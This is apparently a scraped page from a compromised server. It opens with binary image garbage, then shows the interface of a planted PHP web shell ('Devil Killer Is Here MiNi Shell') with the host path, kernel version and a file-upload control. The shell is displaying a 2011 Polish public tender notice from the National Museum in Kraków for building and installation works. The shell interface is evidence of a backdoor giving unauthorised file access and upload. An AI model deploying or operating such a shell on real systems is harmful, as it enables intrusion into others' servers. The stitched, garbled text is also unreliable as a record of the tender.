JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110422/122769-N-2011.html

<p class="kh_header"><b>Kraków: Przedmiotem zamówienia jest wykonanie robót budowlanych w o/MNK Spichlerz w zakresie branży ogólnobudowlanej i instalacyjnej wraz z uzyskaniem pozwolenia na użytkowanie</b><br>
<b>Numer ogłoszenia: 122769 - 2011; data zamieszczenia: 22.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Krakowie , Al. 3-go Maja 1, 30-062 Kraków, woj. małopolskie, tel. 012 2955621, faks 012 2955555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w o/MNK Spichlerz w zakresie branży ogólnobudowlanej i instalacyjnej wraz z uzyskaniem pozwolenia na użytkowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w o/MNK Spichlerz w zakresie branży ogólnobudowlanej i instalacyjnej wraz z uzyskaniem pozwolenia na użytkowanie. Niniejszym postępowaniem objęte jest wykonanie robót branży ogólnobudowlanej oraz w następujących branżach instalacyjnych:
instalacje wod-kan,
instalacje centralnego ogrzewania,
instalacje wentylacji, klimatyzacji i wody lodowej,
instalacje elektryczne,
instalacje słaboprądowe.
Realizacja robót będzie podzielona na  trzy etapy. Przy czym:
Etap I (termin realizacji do 15.08.2011 r.) obejmował będzie wykonanie następującego zakresu:
roboty budowlane i instalacyjne umożliwiające uruchomienie i odbiór przez MPEC wymiennikowni w piwnicy budynku.
Etap II (termin realizacji do 30.11.2011 r.) obejmował będzie wykonanie 
robót  budowlanych i instalacyjnych, których zakres zostanie ustalony w harmonogramie, w ramach środków jakie Zamawiający jest w stanie przeznaczyć na realizację w roku 2011, tj. w kwocie około 400 tys. zł stanowiącej dotację udzieloną  z Narodowego Funduszu Rewaloryzacji Zabytków Krakowa.  
Etap III (termin realizacji do 15.11.2012 r.)
 obejmował będzie pozostałe roboty budowlane i instalacyjne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu
Zamawiający wymaga wniesienia przez Wykonawców wadium w wysokości: 80.000,00 zł.
Wadium wnosi się przed upływem terminu składania ofert. 
Wadium może być wnoszone w:
-pieniądzu;
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-gwarancjach bankowych;
-gwarancjach ubezpieczeniowych;
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. 2007 r. Nr 42, poz. 275 z późn. zm.).

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 
CITI Handlowy: 62 1030 1508 0000 0008 1536 0001
W pozostałych formach wadium należy złożyć w siedzibie zamawiającego 
Al. 3-go Maja 1, 30-062 Kraków, pok. 048 w dziale księgowości.
Wadium należy złożyć w zaklejonej kopercie opisanej: wadium przetargowe: 
Nr postępowania EP-271-20/11 oraz datę.

 Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 

 Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.

 Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

 Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium , jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.

 Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.


Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnianiu warunków w postępowaniu. Metoda spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy którzy wykażą zrealizowanie w okresie ostatnich pięciu lat, przed terminem składania wniosków, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie  min.  2 realizacji polegających na wykonywaniu robót budowlanych w zakresie branż: ogólnobudowlanej z robotami wykończeniowymi, instalacji sanitarnych, elektrycznych i słaboprądowych w obiekcie zabytkowym, o wartości każdej roboty co najmniej 2.000.000,00  zł netto  wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
W przypadku składania wniosku  o dopuszczenie do udziału w postepowaniu przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie.  Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.                  Metoda spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnianiu warunków w postępowaniu. Metoda spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy którzy wykażą na potwierdzenie  spełniania ww warunku dysponowanie osobami zdolnymi do wykonania zamówienia, tj.: w zakresie osób zdolnych do wykonania zamówienia Wykonawca wskazuje osoby o następujących kwalifikacjach:
1) kierownik budowy:
posiada uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi bez ograniczeń oraz uprawnienia do prowadzenia robót budowlanych w obiektach zabytkowych określone w §8.1. rozporządzenia Ministra Kultury z dnia 9.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150, poz. 1579),
2)kierownik robót branży sanitarnej:
posiada uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
 posiada uprawnienia do prowadzenia robót budowlanych w obiektach zabytkowych bez ograniczeń określone w §8.1. rozporządzenia Ministra Kultury z dnia 9.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150, poz. 1579),
3) w zakresie   robót branży elektrycznej i słaboprądowej:
a) kierownik robót branży elektrycznej: posiada uprawnienia budowlane do kierowania robotami tj. w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz dodatkowo posiada świadectwo kwalifikacyjne E  i D do 1kV lub wyższe, posiada uprawnienia do prowadzenia robót budowlanych w obiektach zabytkowych określone w §8.1. rozporządzenia Ministra Kultury z dnia 9.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150, poz. 1579). 
b) kierownik robót  branży słaboprądowej  posiada uprawnienia budowlane do kierowania robotami tj. w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz dodatkowo posiada świadectwo kwalifikacyjne E  i D do 1kV lub wyższe, a ponadto posiada licencję zabezpieczenia technicznego II stopnia oraz zaświadczenie o ukończeniu specjalistycznych kursów z zakresu zabezpieczenia obiektów muzealnych, organizowanych przez Ośrodek 
Ochrony  Zbiorów Publicznych zgodnie z § 12 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 1 grudnia 2008 r. w sprawie zabezpieczania zbiorów w muzeach przed pożarem, kradzieżą i innym niebezpieczeństwie grożącym zniszczeniem lub utratą zbiorów oraz sposobów przygotowania zbiorów do ewakuacji w razie powstania zagrożenia (Dz. U. 08.229.1528) oraz posiada uprawnienia do prowadzenia robót budowlanych w obiektach zabytkowych określone w §8.1. rozporządzenia Ministra Kultury z dnia 9.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150, poz. 1579). 
Wykonujący instalacje alarmowe powinni posiadać koncesję Ministerstwa Spraw Wewnętrznych i Administracji w zakresie usług ochrony mienia realizowanych w formie zabezpieczenia technicznego.

 Pracownicy wykonujący roboty w zakresie branży elektrycznej: posiadają świadectwo kwalifikacyjne E do 1kV lub wyższe. Pracownicy wykonujący roboty w zakresie branży słaboprądowej powinni posiadać licencje zabezpieczenia technicznego co najmniej I stopnia(dotyczy instalacji alarmowych)  w tym koncesję Ośrodka Ochrony Zbiorów Publicznych oraz  zaświadczenie o ukończeniu specjalistycznych kursów z zakresu zabezpieczenia obiektów muzealnych, organizowanych przez Ośrodek 
Ochrony  Zbiorów Publicznych zgodnie z § 12 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 1 grudnia 2008 r. w sprawie zabezpieczania zbiorów w muzeach przed pożarem, kradzieżą i innym niebezpieczeństwie grożącym zniszczeniem lub utratą zbiorów oraz sposobów przygotowania zbiorów do ewakuacji w razie powstania zagrożenia (Dz. U. 08.229.1528).
W zakresie warunku udziału w postępowaniu określonego powyżej, w odniesieniu do obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państwa członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), uprawnienia do wykonywania zawodu muszą spełniać warunki określone w ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej Dz.U.08.63.394. W przypadku składania wniosku  przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie.              Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.Metoda spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania zostaną dopuszczeni Wykonawcy którzy posiadają opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że    
Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia na kwotę 2.000.000,00 zł. 


Metoda spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 7.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Do składania ofert, Zamawiający zaprosi nie więcej niż 7 Wykonawców, którzy spełniają wymagane w niniejszym ogłoszeniu warunki  udziału w postępowaniu. Jeżeli warunki wskazane przez Zamawiającego w pkt III 3, spełni więcej niż 7 Wykonawców, Zamawiający zaprosi tych którzy otrzymali najwyższe oceny spełniania warunku opisanego w pkt III.3.2) tj.  którzy wykażą się największą ilością  wykonanych robót - Wykonawca otrzyma 1 punkt za każdą robotę budowlaną zgodną z opisem w pkt III.3.2 nin. ogłoszenia wskazana w wykazie. W przypadku otrzymania przez dwóch Wykonawców takiej samej ilości punktów, dodatkowy 1  punkt otrzyma Wykonawca, który będzie miał najwyższą wartość sumaryczną zrealizowanych robót.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zawartej umowie nie jest możliwe wprowadzanie istotnych zmian w stosunku  do treści oferty poza przewidzianymi w niniejszej specyfikacji.
Warunki i okoliczności uprawniające do wniosku o zmianę.

1.	Zamawiający przewiduje i zastrzega sobie prawo wprowadzenia  zmiany w treści umowy w zakresie:
1)	terminów  określonych umową i jej załącznikami z wyłączeniem sytuacji w których zmiana terminu związana jest ze zwłoką w wykonywaniu umowy przez Wykonawcę.
Zmiana terminów wykonania może dotyczyć przedłużenia okresu realizacji robót na wniosek Zamawiającego maksymalnie do 6 miesięcy. W takim przypadku Wykonawca zostanie powiadomiony o zmianie na minimum 30 dni przed jej wprowadzeniem. Wykonawca sporządzi nowy haromonogram rzeczowo- finansowy uwzględniający realizację umowy w zmienionym terminie a z tego  tytułu nie przysługują mu  dodatkowe koszty.
W przypadku konieczności  wprowadzenia zmiany polegającej na przedłużeniu terminu  wykonania o więcej niż 6 miesięcy Wykonawcy przysługuje przy rozliczeniu robót wykonywanych w dłuższym okresie waloryzacja ceny określonej w ofercie wg wskaźnika wzrostu cen towarów i usług konsumpcyjnych ogłaszanego przez prezesa Głównego Urzędu Statystycznego za dany okres czasu.

2)	Zakresu zamówienia (roboty  zamienne, roboty dodatkowe, rezygnacja z części  robót) na następujących  warunkach:
- zmiany w przypadku rozbieżności pomiędzy pozycjami kosztorysu ofertowego a projektem wykonawczym. Wykonawca wówczas zobowiązany będzie do wykonania zakresu robót według wskazań Zamawiającego a wycena ich oparta będzie na stawkach określonych  w ofercie,
- zmiany w przypadku konieczności rezygnacji z pewnego  zakresu robót i wprowadzenie robót zamiennych i/lub robót dodatkowych, o ile zmiana nie wymaga uzyskania pozwolenia na budowę na te roboty,
- zmiany sposobu realizacji zamówienia o ile wpływa ona pozytywnie na realizacje umowy dla obydwu stron; sposób rozliczenia i płatności,
- zmiany ceny w przypadku zmiany ustawowej stawki podatku VAT; w takim przypadku cena netto określona w ofercie pozostaje bez zmian,
- zmiany osób realizujących zamówienie pod warunkiem wykazania przez Wykonawcę iż wskazane przez niego osoby posiadają kwalifikacje nie mniejsze niż osoby wymienione  w ofercie oraz zmiana podwykonawcy,
- zmiany technologii  lub urządzeń technicznych spowodowanej nowymi, lepszymi  rozwiązaniami technicznymi lub zmianą przepisów prawa.

3) Zmiany  określone w pkt 3 uzasadnione mogą być przyczynami organizacyjnymi i technicznymi oraz następującymi  okolicznościami:
a) zmiana dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru 
robót budowlanych , 
b) niesprzyjające warunki fizyczne i klimatyczne,
c) wykopaliska i prace archeologiczne,
d) zawieszenie przez Zamawiającego wykonywania robót,
e) zmiany projektu w wyniku zmian przepisów prawa,	
siła wyższa,
f) zmian przepisów lub Wytycznych i Warunków Organizacji i Robót stanowiących załącznik do Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych obowiązujących w dniu zawarcia umowy, 
g) potrzeba dostosowania realizacji inwestycji do obowiązującego stanu prawnego,
h) decyzje organów administracji państwowej,

a wniosek o zmianę przysługuje w ww. zakresie odpowiednio Zamawiającemu i Wykonawcy.
 
Zamawiający na powyższy zakres przedłoży propozycję zmiany umowy w formie aneksu.

4) Wykonawca zobowiązany jest do ostrzegania Zamawiającego, tak wcześnie jak 
to możliwe, o szczególnych przyszłych wydarzeniach i okolicznościach, które mogą wpłynąć na jakość robót (w każdy sposób) lub opóźnienie w ich realizacji. Zamawiający zażąda od wykonawcy oceny wpływu przyszłego wydarzenia i okoliczności wpływających na cenę umowną i na datę zakończenia wykonywania usług
